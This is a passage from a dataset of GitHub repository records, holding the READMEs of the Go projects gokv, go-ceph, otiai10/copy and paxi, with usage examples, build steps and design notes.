[Amazon S3](https://aws.amazon.com/s3/) / [Google Cloud Storage](https://cloud.google.com/storage/) / [Alibaba Cloud Object Storage Service (OSS)](https://www.alibabacloud.com/en/product/oss) / [DigitalOcean Spaces](https://www.digitalocean.com/products/spaces/) / [Scaleway Object Storage](https://www.scaleway.com/object-storage/) / [OpenStack Swift](https://github.com/openstack/swift) / [Ceph](https://github.com/ceph/ceph) / [Minio](https://github.com/minio/minio) / ...\n - [ ] [Azure Cosmos DB](https://azure.microsoft.com/en-us/services/cosmos-db/)\n - [X] [Azure Table Storage](https://azure.microsoft.com/en-us/services/storage/tables/)\n - [X] [Google Cloud Datastore](https://cloud.google.com/datastore/)\n - [ ] [Google Cloud Firestore](https://cloud.google.com/firestore/)\n - [X] [Alibaba Cloud Table Store](https://www.alibabacloud.com/de/product/table-store)\n- SQL\n - [X] [MySQL](https://github.com/mysql/mysql-server)\n - [X] [PostgreSQL](https://github.com/postgres/postgres)\n- NoSQL\n - [X] [MongoDB](https://github.com/mongodb/mongo)\n - [ ] [Apache Cassandra](https://github.com/apache/cassandra)\n- \"NewSQL\"\n - [X] [CockroachDB](https://github.com/cockroachdb/cockroach)\n - [ ] [TiDB](https://github.com/pingcap/tidb)\n- Multi-model\n - [X] [Apache Ignite](https://github.com/apache/ignite)\n - [ ] [ArangoDB](https://github.com/arangodb/arangodb)\n - [ ] [OrientDB](https://github.com/orientechnologies/orientdb)\n\nAgain: \nFor differences between the implementations, see [Choosing an implementation](docs/choosing-implementation.md). \nFor the Godoc of specific implementations, see .\n\n### Value types\n\nMost Go packages for key-value stores just accept a `[]byte` as value, which requires developers for example to marshal (and later unmarshal) their structs. `gokv` is meant to be simple and make developers' lifes easier, so it accepts any type (with using `interface{}` as parameter), including structs, and automatically (un-)marshals the value.\n\nThe kind of (un-)marshalling is left to the implementation. All implementations in this repository currently support JSON and [gob](https://blog.golang.org/gobs-of-data) by using the `encoding` subpackage in this repository, which wraps the core functionality of the standard library's `encoding/json` and `encoding/gob` packages. See [Marshal formats](#marshal-formats) for details.\n\nFor unexported struct fields to be (un-)marshalled to/from JSON/gob, the respective custom (un-)marshalling methods need to be implemented as methods of the struct (e.g. `MarshalJSON() ([]byte, error)` for custom marshalling into JSON). See [Marshaler](https://pkg.go.dev/encoding/json#Marshaler) and [Unmarshaler](https://pkg.go.dev/encoding/json#Unmarshaler) for JSON, and [GobEncoder](https://pkg.go.dev/encoding/gob#GobEncoder) and [GobDecoder](https://pkg.go.dev/encoding/gob#GobDecoder) for gob.\n\nTo improve performance you can also implement the custom (un-)marshalling methods so that no reflection is used by the `encoding/json` / `encoding/gob` packages. This is not a disadvantage of using a generic key-value store package, it's the same as if you would use a concrete key-value store package which only accepts `[]byte`, requiring you to (un-)marshal your structs.\n\n### Marshal formats\n\nThis repository contains the subpackage `encoding`, which is an abstraction and wrapper for the core functionality of packages like `encoding/json` and `encoding/gob`. The currently supported marshal formats are:\n\n- [X] JSON\n- [X] [gob](https://blog.golang.org/gobs-of-data)\n\nMore formats will be supported in the future (e.g. XML).\n\nThe stores use this `encoding` package to marshal and unmarshal the values when storing / retrieving them. The default format is JSON, but all `gokv.Store` implementations in this repository also support [gob](https://blog.golang.org/gobs-of-data) as alternative, configurable via their `Options`.\n\nThe marshal format is up to the implementations though, so package creators using the `gokv.Store` interface as parameter of a function should not make any assumptions about this. If they require any specific format they should inform the package user about this in the GoDoc of the function taking the store interface as parameter.\n\nDifferences between the formats:\n\n- Depending on the struct, one of the formats might be faster\n- Depending on the struct, one of the formats might lead to a lower storage size\n- Depending on the use case, the custom (un-)marshal methods of one of the formats might be easier to implement\n - JSON: [`MarshalJSON() ([]byte, error)`](https://pkg.go.dev/encoding/json#Marshaler) and [`UnmarshalJSON([]byte) error`](https://pkg.go.dev/encoding/json#Unmarshaler)\n - gob: [`GobEncode() ([]byte, error)`](https://pkg.go.dev/encoding/gob#GobEncoder) and [`GobDecode([]byte) error`](https://pkg.go.dev/encoding/gob#GobDecoder)\n\n### Roadmap\n\n- Benchmarks!\n- CLI: A simple command line interface tool that allows you create, read, update and delete key-value pairs in all of the `gokv` storages\n- A `combiner` package that allows you to create a `gokv.Store` which forwards its call to multiple implementations at the same time. So for example you can use `memcached` and `s3` simultaneously to have 1) super fast access but also 2) durable redundant persistent storage.\n- A way to directly configure the clients via the options of the underlying used Go package (e.g. not the `redis.Options` struct in `github.com/philippgille/gokv`, but instead the `redis.Options` struct in `github.com/go-redis/redis`)\n - Will be optional and discouraged, because this will lead to compile errors in code that uses `gokv` when switching the underlying used Go package, but definitely useful for some people\n- More stores (see stores in [Implementations](#implementations) list with unchecked boxes)\n- Maybe rename the project from `gokv` to `SimpleKV`?\n- Maybe move all implementation packages into a subdirectory, e.g. `github.com/philippgille/gokv/store/redis`?\n\nUsage\n-----\n\nFirst, download the [module](https://github.com/golang/go/wiki/Modules) you want to work with:\n\n- For example when you want to work with the `gokv.Store` interface:\n - `go get github.com/philippgille/gokv@latest`\n- For example when you want to work with the Redis implementation:\n - `go get github.com/philippgille/gokv/redis@latest`\n\nThen you can import and use it.\n\nEvery implementation has its own `Options` struct, but all implementations have a `NewStore()` / `NewClient()` function that returns an object of a sctruct that implements the `gokv.Store` interface. Let's take the implementation for Redis as example, which is the most popular distributed key-value store.\n\n```go\npackage main\n\nimport (\n \"fmt\"\n\n \"github.com/philippgille/gokv\"\n \"github.com/philippgille/gokv/redis\"\n)\n\ntype foo struct {\n Bar string\n}\n\nfunc main() {\n options := redis.DefaultOptions // Address: \"localhost:6379\", Password: \"\", DB: 0\n\n // Create client\n client, err := redis.NewClient(options)\n if err != nil {\n panic(err)\n }\n defer client.Close()\n\n // Store, retrieve, print and delete a value\n interactWithStore(client)\n}\n\n// interactWithStore stores, retrieves, prints and deletes a value.\n// It's completely independent of the store implementation.\nfunc interactWithStore(store gokv.Store) {\n // Store value\n val := foo{\n Bar: \"baz\",\n }\n err := store.Set(\"foo123\", val)\n if err != nil {\n panic(err)\n }\n\n // Retrieve value\n retrievedVal := new(foo)\n found, err := store.Get(\"foo123\", retrievedVal)\n if err != nil {\n panic(err)\n }\n if !found {\n panic(\"Value not found\")\n }\n\n fmt.Printf(\"foo: %+v\", *retrievedVal) // Prints `foo: {Bar:baz}`\n\n // Delete value\n err = store.Delete(\"foo123\")\n if err != nil {\n panic(err)\n }\n}\n```\n\nAs described in the comments, that code does the following:\n\n1. Create a client for Redis\n - Some implementations' stores/clients don't require to be closed, but when working with the interface (for example as function parameter) you *must* call `Close()` because you don't know which implementation is passed. Even if you work with a specific implementation you *should* always call `Close()`, so you can easily change the implementation without the risk of forgetting to add the call.\n2. Call `interactWithStore()`, which requires a `gokv.Store` as parameter. This method then:\n 1. Stores an object of type `foo` in the Redis server running on `localhost:6379` with the key `foo123`\n 2. Retrieves the value for the key `foo123`\n - The check if the value was found isn't needed in this example but is included for demonstration purposes\n 3. Prints the value. It prints `foo: {Bar:baz}`, which is exactly what was stored before.\n 4. Deletes the value\n\nNow let's say you don't want to use Redis but Consul instead. You just have to make three simple changes:\n\n1. Replace the import of `\"github.com/philippgille/gokv/redis\"` by `\"github.com/philippgille/gokv/consul\"`\n2. Replace `redis.DefaultOptions` by `consul.DefaultOptions`\n3. Replace `redis.NewClient(options)` by `consul.NewClient(options)`\n\nEverything else works the same way. `interactWithStore()` is completely unaffected.\n\nProject status\n--------------\n\n> Note: `gokv`'s API is not stable yet and is under active development. Upcoming releases are likely to contain breaking changes as long as the version is `v0.x.y`. You should use vendoring to prevent bad surprises. This project adheres to [Semantic Versioning](http://semver.org/spec/v2.0.0.html) and all notable changes to this project are documented in [RELEASES.md](https://github.com/philippgille/gokv/blob/master/RELEASES.md).\n\nPlanned interface methods until `v1.0.0`:\n\n- `List(interface{}) error` / `GetAll(interface{}) error` or similar\n\nThe interface might even change until `v1.0.0`. For example one consideration is to change `Get(string, interface{}) (bool, error)` to `Get(string, interface{}) error` (no boolean return value anymore), with the `error` being something like `gokv.ErrNotFound // \"Key-value pair not found\"` to fulfill the additional role of indicating that the key-value pair wasn't found. But at the moment we prefer the current method signature.\n\nAlso, more interfaces might be added. For example so that there's a `SimpleStore` and an `AdvancedStore`, with the first one containing only the basic methods and the latter one with advanced features such as key-value pair lifetimes (deletion of key-value pairs after a given time), notification of value changes via Go channels etc. But currently the focus is simplicity, see [Design decisions](#design-decisions).\n\nMotivation\n----------\n\nWhen creating a package you want the package to be usable by as many developers as possible. Let's look at a specific example: You want to create a paywall middleware for the Gin web framework. You need some database to store state. You can't use a Go map, because its data is not persisted across web service restarts. You can't use an embedded DB like bbolt, BadgerDB or SQLite, because that would restrict the web service to one instance, but nowadays every web service is designed with high horizontal scalability in mind. If you use Redis, MongoDB or PostgreSQL though, you would force the package user (the developer who creates the actual web service with Gin and your middleware) to run and administrate the server, even if she might never have used it before and doesn't know how to configure them for high performance and security.\n\nAny decision for a specific database would limit the package's usability.\n\nOne solution would be a custom interface where you would leave the implementation to the package user. But that would require the developer to dive into the details of the Go package of the chosen key-value store. And if the developer wants to switch the store, or maybe use one for local testing and another for production, she would need to write *multiple* implementations.\n\n`gokv` is the solution for these problems. Package *creators* use the `gokv.Store` interface as parameter and can call its methods within their code, leaving the decision which actual store to use to the package user. Package *users* pick one of the implementations, for example `github.com/philippgille/gokv/redis` for Redis and pass the `redis.Client` created by `redis.NewClient(...)` as parameter. Package users can also develop their own implementations if they need to.\n\n`gokv` doesn't just have to be used to satisfy some `gokv.Store` parameter. It can of course also be used by application / web service developers who just don't want to dive into the sometimes complicated usage of some key-value store packages.\n\nInitially it was developed as `storage` package within the project [ln-paywall](https://github.com/philippgille/ln-paywall) to provide the users of ln-paywall with multiple storage options, but at some point it made sense to turn it into a repository of its own.\n\nBefore doing so I examined existing Go packages with a similar purpose (see [Related projects](#related-projects)), but none of them fit my needs. They either had too few implementations, or they didn't automatically marshal / unmarshal passed structs, or the interface had too many methods, making the project seem too complex to maintain and extend, proven by some that were abandoned or forked (splitting the community with it).\n\nDesign decisions\n----------------\n\n- `gokv` is primarily an abstraction for **key-value stores**, not caches, so there's no need for cache eviction and timeouts.\n - It's still possible to have cache eviction. In some cases you can configure it on the server, or in case of Memcached it's even the default. Or you can have an implementation-specific `Option` that configures the key-value store client to set a timeout on some key-value pair when storing it in the server. But this should be implementation-specific and not be part of the interface methods, which would require *every* implementation to support cache eviction.\n- The package should be usable without having to write additional code, so structs should be (un-)marshalled automatically, without having to implement `MarshalJSON()` / `GobEncode()` and `UnmarshalJSON()` / `GobDecode()` first. It's still possible to implement these methods to customize the (un-)marshalling, for example to include unexported fields, or for higher performance (because the `encoding/json` / `encoding/gob` package doesn't have to use reflection).\n- It should be easy to create your own store implementations, as well as to review and maintain the code of this repository, so there should be as few interface methods as possible, but still enough so that functions taking the `gokv.Store` interface as parameter can do everything that's usually required when working with a key-value store. For example, a boolean return value for the `Delete` method that indicates whether a value was actually deleted (because it was previously present) can be useful, but isn't a must-have, and also it would require some `Store` implementations to implement the check by themselves (because the existing libraries don't support it), which would unnecessarily decrease performance for those who don't need it. Or as another example, a `Watch(key string) (<-chan Notification, error)` method that sends notifications via a Go channel when the value of a given key changes is nice to have for a few use cases, but in most cases it's not required.\n - > Note: In the future we might add another interface, so that there's one for the basic operations and one for advanced uses.\n- Similar projects name the structs that are implementations of the store interface according to the backing store, for example `boltdb.BoltDB`, but this leads to so called \"stuttering\" that's discouraged when writing idiomatic Go. That's why `gokv` uses for example `bbolt.Store` and `syncmap.Store`. For easier differentiation between embedded DBs and DBs that have a client and a server component though, the first ones are called `Store` and the latter ones are called `Client`, for example `redis.Client`.\n- All errors are implementation-specific. We could introduce a `gokv.StoreError` type and define some constants like a `SetError` or something more specific like a `TimeoutError`, but non-specific errors don't help the package user, and specific errors would make it very hard to create and especially maintain a `gokv.Store` implementation. You would need to know exactly in which cases the package (that the implementation uses) returns errors, what the errors mean (to \"translate\" them) and keep up with changes and additions of errors in the package. So instead, errors are just forwarded. For example, if you use the `dynamodb` package, the returned errors will be errors from the `\"github.com/aws/aws-sdk-go` package.\n- Keep the terminology of used packages. This might be controversial, because an abstraction / wrapper *unifies* the interface of the used packages. But:\n 1. Naming is hard. If one used package for an embedded database uses `Path` and another `Directory`, then how should be name the option for the database directory? Maybe `Folder`, to add to the confusion? Also, some users might already have used the packages we use directly and they would wonder about the \"new\" variable name which has the same meaning. \n Using the packages' variable names spares us the need to come up with unified, understandable variable names without alienating users who already used the packages we use directly.\n 2. Only few users are going to switch back and forth between `gokv.Store` implementations, so most user won't even notice the differences in variable names.\n- Each `gokv` implementation is a Go module. This differs from repositories that contain a single Go module with many subpackages, but has the huge advantage that if you only want to work with the Redis client for example, the `go get` will only fetch the Redis dependencies and not the huge amount of dependencies that are used across the whole repository.\n\nRelated projects\n----------------\n\n- [libkv](https://github.com/docker/libkv)\n - Uses `[]byte` as value, no automatic (un-)marshalling of structs\n - No support for Redis, BadgerDB, Go map, MongoDB, AWS DynamoDB, Memcached, MySQL, ...\n - Not actively maintained anymore (3 direct commits + 1 merged PR in the last 10+ months, as of 2018-10-13)\n- [valkeyrie](https://github.com/abronan/valkeyrie)\n - Fork of libkv\n - Same disadvantage: Uses `[]byte` as value, no automatic (un-)marshalling of structs\n - No support for BadgerDB, Go map, MongoDB, AWS DynamoDB, Memcached, MySQL, ...\n- [gokvstores](https://github.com/ulule/gokvstores)\n - Only supports Redis and local in-memory cache\n - Not actively maintained anymore (4 direct commits + 1 merged PR in the last 10+ months, as of 2018-10-13)\n - 13 stars (as of 2018-10-13)\n- [gokv](https://github.com/gokv)\n - Requires a `json.Marshaler` / `json.Unmarshaler` as parameter, so you always need to explicitly implement their methods for your structs, and also you can't use gob or other formats for (un-)marshaling.\n - No support for Consul, etcd, bbolt / Bolt, BadgerDB, MongoDB, AWS DynamoDB, Memcached, MySQL, ...\n - Separate repo for each implementation, which has advantages and disadvantages\n - No releases (makes it harder to use with package managers like dep)\n - 2-7 stars (depending on the repository, as of 2018-10-13)\n\nOthers:\n\n- [gladkikhartem/gokv](https://github.com/gladkikhartem/gokv): No `Delete()` method, no Redis, embedded DBs etc., no Git tags / releases, no stars (as of 2018-11-28)\n- [bradberger/gokv](https://github.com/bradberger/gokv): Not maintained (no commits in the last 22 months), no Redis, Consul etc., no Git tags / releases, 1 star (as of 2018-11-28)\n - This package inspired me to implement something similar to its `Codec`.\n- [ppacher/gokv](https://github.com/ppacher/gokv): Not maintained (no commits in the last 22 months), no Redis, embedded DBs etc., no automatic (un-)marshalling, 1 star (as of 2018-11-28)\n - Nice CLI!\n- [kapitan-k/gokvstore](https://github.com/kapitan-k/gokvstore): Not actively maintained (no commits in the last 10+ months), RocksDB only, requires cgo, no automatic (un-)marshalling, no Git tags/ releases, 1 star (as of 2018-11-28)\n\nLicense\n-------\n\n`gokv` is licensed under the [Mozilla Public License Version 2.0](https://www.mozilla.org/en-US/MPL/2.0/).\n\n- [FAQ](https://www.mozilla.org/en-US/MPL/2.0/FAQ/)\n- [Summary 1](https://choosealicense.com/licenses/mpl-2.0/)\n- [Summary 2](https://tldrlegal.com/license/mozilla-public-license-2.0-(mpl-2))\n\nDependencies might be licensed under other licenses.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ceph/go-ceph", "link": "https://github.com/ceph/go-ceph", "tags": ["rados", "rbd", "cephfs", "ceph-radosgw", "ceph", "bindings", "golang"], "stars": 518, "description": "Go bindings for Ceph :octopus: :octopus: :octopus:", "lang": "Go", "repo_lang": "", "readme": "# go-ceph - Go bindings for Ceph APIs\n\n[![Godoc](http://img.shields.io/badge/godoc-reference-blue.svg?style=flat)](https://godoc.org/github.com/ceph/go-ceph) [![license](http://img.shields.io/badge/license-MIT-red.svg?style=flat)](https://raw.githubusercontent.com/ceph/go-ceph/master/LICENSE)\n\n## Introduction\n\nThe go-ceph project is a collection of API bindings that support the use of\nnative Ceph APIs, which are C language functions, in Go. These bindings make\nuse of Go's cgo feature.\nThere are three main Go sub-packages that make up go-ceph:\n* rados - exports functionality from Ceph's librados\n* rbd - exports functionality from Ceph's librbd\n* cephfs - exports functionality from Ceph's libcephfs\n* rgw/admin - interact with [radosgw admin ops API](https://docs.ceph.com/en/latest/radosgw/adminops)\n\nWe aim to provide comprehensive support for the Ceph APIs over time. This\nincludes both I/O related functions and management functions. If your project\nmakes use of Ceph command line tools and is written in Go, you may be able to\nswitch away from shelling out to the CLI and to these native function calls.\n\n## Installation\n\nThe code in go-ceph is purely a library module. Typically, one will import\ngo-ceph in another Go based project. When building the code the native RADOS,\nRBD, & CephFS library and development headers are expected to be installed.\n\nOn debian based systems (apt) these may be:\n```sh\nlibcephfs-dev librbd-dev librados-dev\n```\n\nOn rpm based systems (dnf, yum, etc) these may be:\n```sh\nlibcephfs-devel librbd-devel librados-devel\n```\n\nOn MacOS you can use brew to install the libraries:\n```sh\nbrew tap mulbc/ceph-client\nbrew install ceph-client\n```\n\nNOTE: CentOS users may want to use a\n[CentOS Storage SIG](https://wiki.centos.org/SpecialInterestGroup/Storage/Ceph)\nrepository to enable packages for a supported ceph version.\nExample: `dnf -y install centos-release-ceph-pacific`.\n(CentOS 7 users should use \"yum\" rather than \"dnf\")\n\n\nTo quickly test if one can build with go-ceph on your system, run:\n```sh\ngo get github.com/ceph/go-ceph\n```\n\nOnce compiled, code using go-ceph is expected to dynamically link to the Ceph\nlibraries. These libraries must be available on the system where the go based\nbinaries will be run. Our use of cgo and ceph libraries does not allow for\nfully static binaries.\n\ngo-ceph tries to support different Ceph versions. However some functions might\nonly be available in recent versions, and others may be deprecated. In order to\nwork with non-current versions of Ceph, it is required to pass build-tags to\nthe `go` command line. A tag with the named Ceph release will enable/disable\ncertain features of the go-ceph packages, and prevent warnings or compile\nproblems. For example, to ensure you select the library features that match\nthe \"pacific\" release, use:\n```sh\ngo build -tags pacific ....\ngo test -tags pacific ....\n```\n\n### Supported Ceph Versions\n\n| go-ceph version | Supported Ceph Versions | Deprecated Ceph Versions |\n| --------------- | ------------------------| -------------------------|\n| v0.20.0 | pacific, quincy | nautilus, octopus |\n| v0.19.0 | pacific, quincy | nautilus, octopus |\n| v0.18.0 | octopus, pacific, quincy | nautilus |\n| v0.17.0 | octopus, pacific, quincy | nautilus |\n| v0.16.0 | octopus, pacific\u2020 | nautilus |\n| v0.15.0 | octopus, pacific | nautilus |\n| v0.14.0 | octopus, pacific | nautilus |\n| v0.13.0 | octopus, pacific | nautilus |\n| v0.12.0 | octopus, pacific | nautilus |\n| v0.11.0 | nautilus, octopus, pacific | |\n| v0.10.0 | nautilus, octopus, pacific | |\n| v0.9.0 | nautilus, octopus | |\n| v0.8.0 | nautilus, octopus | |\n| v0.7.0 | nautilus, octopus | |\n| v0.6.0 | nautilus, octopus | mimic |\n| v0.5.0 | nautilus, octopus | luminous, mimic |\n| v0.4.0 | luminous, mimic, nautilus, octopus | |\n| v0.3.0 | luminous, mimic, nautilus, octopus | |\n| v0.2.0 | luminous, mimic, nautilus | |\n| (pre release) | luminous, mimic (see note) | |\n\nThese tags affect what is supported at compile time. What version of the Ceph\ncluster the client libraries support, and vice versa, is determined entirely\nby what version of the Ceph C libraries go-ceph is compiled with.\n\n\u2020 Preliminary support for Ceph Quincy was available, but not fully tested, in\nthis release.\n\nNOTE: Prior to 2020 the project did not make versioned releases. The ability to\ncompile with a particular Ceph version before go-ceph v0.2.0 is not guaranteed.\n\n\n## Documentation\n\nDetailed API documentation is available at\n.\n\nSome [API Hints and How-Tos](./docs/hints.md) are also available to quickly\nintroduce how some of API calls work together.\n\n\n## Development\n\n```\ndocker run --rm -it --net=host \\\n --security-opt apparmor:unconfined \\\n -v ${PWD}:/go/src/github.com/ceph/go-ceph:z \\\n -v /home/nwatkins/src/ceph/build:/home/nwatkins/src/ceph/build:z \\\n -e CEPH_CONF=/home/nwatkins/src/ceph/build/ceph.conf \\\n ceph-golang\n```\n\nRun against a `vstart.sh` cluster without installing Ceph:\n\n```\nexport CGO_CPPFLAGS=\"-I/ceph/src/include\"\nexport CGO_LDFLAGS=\"-L/ceph/build/lib\"\ngo build\n```\n\n## Contributing\n\nContributions are welcome & greatly appreciated, every little bit helps. Make code changes via Github pull requests:\n\n- Fork the repo and create a topic branch for every feature/fix. Avoid\n making changes directly on master branch.\n- All incoming features should be accompanied with tests.\n- Make sure that you run `go fmt` before submitting a change\n set. Alternatively the Makefile has a flag for this, so you can call\n `make fmt` as well.\n- The integration tests can be run in a docker container, for this run:\n\n```\nmake test-docker\n```\n\n### Getting in Touch\n\nWant to get in touch with the go-ceph team? We're available through a few\ndifferent channels:\n* Have a question, comment, or feedback:\n [Use the Discussions Board](https://github.com/ceph/go-ceph/discussions)\n* Report an issue or request a feature:\n [Issues Tracker](https://github.com/ceph/go-ceph/issues)\n* We participate in the Ceph\n [user's mailing list](https://lists.ceph.io/hyperkitty/list/ceph-users@ceph.io/)\n and [dev list](https://lists.ceph.io/hyperkitty/list/dev@ceph.io/)\n and we also announce our releases on those lists\n* You can sometimes find us in the\n [#ceph-devel IRC channel](https://ceph.io/irc/) - hours may vary\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "otiai10/copy", "link": "https://github.com/otiai10/copy", "tags": ["golang", "copy", "files", "directory", "recursive", "go", "folder", "folders", "directories"], "stars": 517, "description": "Go copy directory recursively", "lang": "Go", "repo_lang": "", "readme": "# copy\n\n[![Go Reference](https://pkg.go.dev/badge/github.com/otiai10/copy.svg)](https://pkg.go.dev/github.com/otiai10/copy)\n[![Actions Status](https://github.com/otiai10/copy/workflows/Go/badge.svg)](https://github.com/otiai10/copy/actions)\n[![codecov](https://codecov.io/gh/otiai10/copy/branch/main/graph/badge.svg)](https://codecov.io/gh/otiai10/copy)\n[![License: MIT](https://img.shields.io/badge/License-MIT-green.svg)](https://github.com/otiai10/copy/blob/main/LICENSE)\n[![FOSSA Status](https://app.fossa.com/api/projects/git%2Bgithub.com%2Fotiai10%2Fcopy.svg?type=shield)](https://app.fossa.com/projects/git%2Bgithub.com%2Fotiai10%2Fcopy?ref=badge_shield)\n[![CodeQL](https://github.com/otiai10/copy/actions/workflows/codeql-analysis.yml/badge.svg)](https://github.com/otiai10/copy/actions/workflows/codeql-analysis.yml)\n[![Go Report Card](https://goreportcard.com/badge/github.com/otiai10/copy)](https://goreportcard.com/report/github.com/otiai10/copy)\n[![GitHub tag (latest SemVer)](https://img.shields.io/github/v/tag/otiai10/copy?sort=semver)](https://pkg.go.dev/github.com/otiai10/copy)\n[![Docker Test](https://github.com/otiai10/copy/actions/workflows/docker-test.yml/badge.svg)](https://github.com/otiai10/copy/actions/workflows/docker-test.yml)\n[![Vagrant Test](https://github.com/otiai10/copy/actions/workflows/vagrant-test.yml/badge.svg)](https://github.com/otiai10/copy/actions/workflows/vagrant-test.yml)\n\n`copy` copies directories recursively.\n\n# Example Usage\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\tcp \"github.com/otiai10/copy\"\n)\n\nfunc main() {\n\terr := cp.Copy(\"your/src\", \"your/dest\")\n\tfmt.Println(err) // nil\n}\n```\n\n# Advanced Usage\n\n```go\n// Options specifies optional actions on copying.\ntype Options struct {\n\n\t// OnSymlink can specify what to do on symlink\n\tOnSymlink func(src string) SymlinkAction\n\n\t// OnDirExists can specify what to do when there is a directory already existing in destination.\n\tOnDirExists func(src, dest string) DirExistsAction\n\n\t// Skip can specify which files should be skipped\n\tSkip func(srcinfo os.FileInfo, src, dest string) (bool, error)\n\n\t// PermissionControl can control permission of\n\t// every entry.\n\t// When you want to add permission 0222, do like\n\t//\n\t//\t\tPermissionControl = AddPermission(0222)\n\t//\n\t// or if you even don't want to touch permission,\n\t//\n\t//\t\tPermissionControl = DoNothing\n\t//\n\t// By default, PermissionControl = PreservePermission\n\tPermissionControl PermissionControlFunc\n\n\t// Sync file after copy.\n\t// Useful in case when file must be on the disk\n\t// (in case crash happens, for example),\n\t// at the expense of some performance penalty\n\tSync bool\n\n\t// Preserve the atime and the mtime of the entries\n\t// On linux we can preserve only up to 1 millisecond accuracy\n\tPreserveTimes bool\n\n\t// Preserve the uid and the gid of all entries.\n\tPreserveOwner bool\n\n\t// The byte size of the buffer to use for copying files.\n\t// If zero, the internal default buffer of 32KB is used.\n\t// See https://golang.org/pkg/io/#CopyBuffer for more information.\n\tCopyBufferSize uint\n}\n```\n\n```go\n// For example...\nopt := Options{\n\tSkip: func(info os.FileInfo, src, dest string) (bool, error) {\n\t\treturn strings.HasSuffix(src, \".git\"), nil\n\t},\n}\nerr := Copy(\"your/directory\", \"your/directory.copy\", opt)\n```\n\n# Issues\n\n- https://github.com/otiai10/copy/issues\n\n\n## License\n[![FOSSA Status](https://app.fossa.com/api/projects/git%2Bgithub.com%2Fotiai10%2Fcopy.svg?type=large)](https://app.fossa.com/projects/git%2Bgithub.com%2Fotiai10%2Fcopy?ref=badge_large)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ailidani/paxi", "link": "https://github.com/ailidani/paxi", "tags": ["paxos", "wan", "wpaxos"], "stars": 517, "description": "Paxos protocol framework", "lang": "Go", "repo_lang": "", "readme": "[![GoDoc](https://godoc.org/github.com/ailidani/paxi?status.svg)](https://godoc.org/github.com/ailidani/paxi)\n[![Go Report Card](https://goreportcard.com/badge/github.com/ailidani/paxi)](https://goreportcard.com/report/github.com/ailidani/paxi)\n[![Build Status](https://travis-ci.org/ailidani/paxi.svg?branch=master)](https://travis-ci.org/ailidani/paxi)\n\n\n## What is Paxi?\n\n**Paxi** is the framework that implements WPaxos and other Paxos protocol variants. Paxi provides most of the elements that any Paxos implementation or replication protocol needs, including network communication, state machine of a key-value store, client API and multiple types of quorum systems.\n\n*Warning*: Paxi project is still under heavy development, with more features and protocols to include. Paxi API may change too.\n\nPaxi paper (SIGMOD) can be found in https://dl.acm.org/doi/abs/10.1145/3299869.3319893.\nBibTex:\n```bibtex\n@inproceedings{ailijiang2019dissecting,\n title={Dissecting the Performance of Strongly-Consistent Replication Protocols},\n author={Ailijiang, Ailidani and Charapko, Aleksey and Demirbas, Murat},\n booktitle={Proceedings of the 2019 International Conference on Management of Data},\n pages={1696--1710},\n year={2019}\n}\n```\n\n## What is WPaxos?\n\n**WPaxos** is a multileader Paxos protocol that provides low-latency and high-throughput consensus across wide-area network (WAN) deployments. Unlike statically partitioned multiple Paxos deployments, WPaxos perpetually adapts to the changing access locality through object stealing. Multiple concurrent leaders coinciding in different zones steal ownership of objects from each other using phase-1 of Paxos, and then use phase-2 to commit update-requests on these objects locally until they are stolen by other leaders. To achieve fast phase-2 commits, WPaxos adopts the flexible quorums idea in a novel manner, and appoints phase-2 acceptors to be close to their respective leaders.\n\nWPaxos (WAN Paxos) paper (TPDS journal version) can be found in https://ieeexplore.ieee.org/abstract/document/8765834.\nBibTex:\n```bibtex\n@article{ailijiang2019wpaxos,\n title={WPaxos: Wide area network flexible consensus},\n author={Ailijiang, Ailidani and Charapko, Aleksey and Demirbas, Murat and Kosar, Tevfik},\n journal={IEEE Transactions on Parallel and Distributed Systems},\n volume={31},\n number={1},\n pages={211--223},\n year={2019},\n publisher={IEEE}\n}\n```\n\n## What is included?\n\nAlgorithms:\n- [x] Classical multi-Paxos\n- [x] [Flexible Paxos](https://dl.acm.org/citation.cfm?id=3139656)\n- [x] [WPaxos](https://arxiv.org/abs/1703.08905)\n- [x] [EPaxos](https://dl.acm.org/citation.cfm?id=2517350)\n- [x] [SDPaxos](https://www.microsoft.com/en-us/research/uploads/prod/2018/09/172-zhao.pdf)\n- [x] Atomic Storage ([Majority Replication](http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.174.7245&rep=rep1&type=pdf))\n- [x] [Chain Replication](https://www.cs.cornell.edu/home/rvr/papers/OSDI04.pdf)\n- [x] KPaxos (Static partitioned Paxos)\n- [x] [Dynamo Key-value Store](https://dl.acm.org/citation.cfm?id=1294281)\n- [x] [WanKeeper](http://ieeexplore.ieee.org/abstract/document/7980095/)\n- [x] [Vertical Paxos](https://www.microsoft.com/en-us/research/wp-content/uploads/2009/08/Vertical-Paxos-and-Primary-Backup-Replication-.pdf)\n\n\nFeatures:\n- [x] Benchmarking\n- [x] Linerizability checker\n- [x] Fault injection\n\n\n# How to build\n\n1. Install [Go](https://golang.org/dl/).\n2. Use `go get` command or [Download](https://github.com/wpaxos/paxi/archive/master.zip) Paxi source code from GitHub page.\n```\ngo get github.com/ailidani/paxi\n```\n\n3. Compile everything from `paxi/bin` folder.\n```\ncd github.com/ailidani/paxi/bin\n./build.sh\n```\n\nAfter compile, Golang will generate 3 executable files under `bin` folder.\n* `server` is one replica instance.\n* `client` is a simple benchmark that generates read/write reqeust to servers.\n* `cmd` is a command line tool to test Get/Set requests.\n\n\n# How to run\n\nEach executable file expects some parameters which can be seen by `-help` flag, e.g. `./server -help`.\n\n1. Create the [configuration file](https://github.com/ailidani/paxi/blob/master/bin/config.json) according to the example, then start server with `-config FILE_PATH` option, default to \"config.json\" when omit.\n\n2. Start 9 servers with different ids in format of \"ZONE_ID.NODE_ID\".\n```\n./server -id 1.1 -algorithm=paxos &\n./server -id 1.2 -algorithm=paxos &\n./server -id 1.3 -algorithm=paxos &\n./server -id 2.1 -algorithm=paxos &\n./server -id 2.2 -algorithm=paxos &\n./server -id 2.3 -algorithm=paxos &\n./server -id 3.1 -algorithm=paxos &\n./server -id 3.2 -algorithm=paxos &\n./server -id 3.3 -algorithm=paxos &\n```\n\n3. Start benchmarking client that connects to server ID 1.1 and benchmark parameters specified in 